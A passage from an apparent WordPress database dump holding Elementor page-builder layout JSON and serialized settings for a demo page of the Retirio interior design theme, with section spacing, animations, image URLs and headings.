steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(2987,4736,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(2988,4736,'_elementor_css','a:6:{s:4:\"time\";i:1668396690;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:2;s:7:\"ovaicon\";i:5;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2989,22,'_elementor_pro_version','3.8.1'),(2990,4737,'_wp_page_template','elementor_header_footer'),(2991,4737,'_elementor_edit_mode','builder'),(2992,4737,'_elementor_template_type','wp-page'),(2993,4737,'_elementor_version','3.8.1'),(2994,4737,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{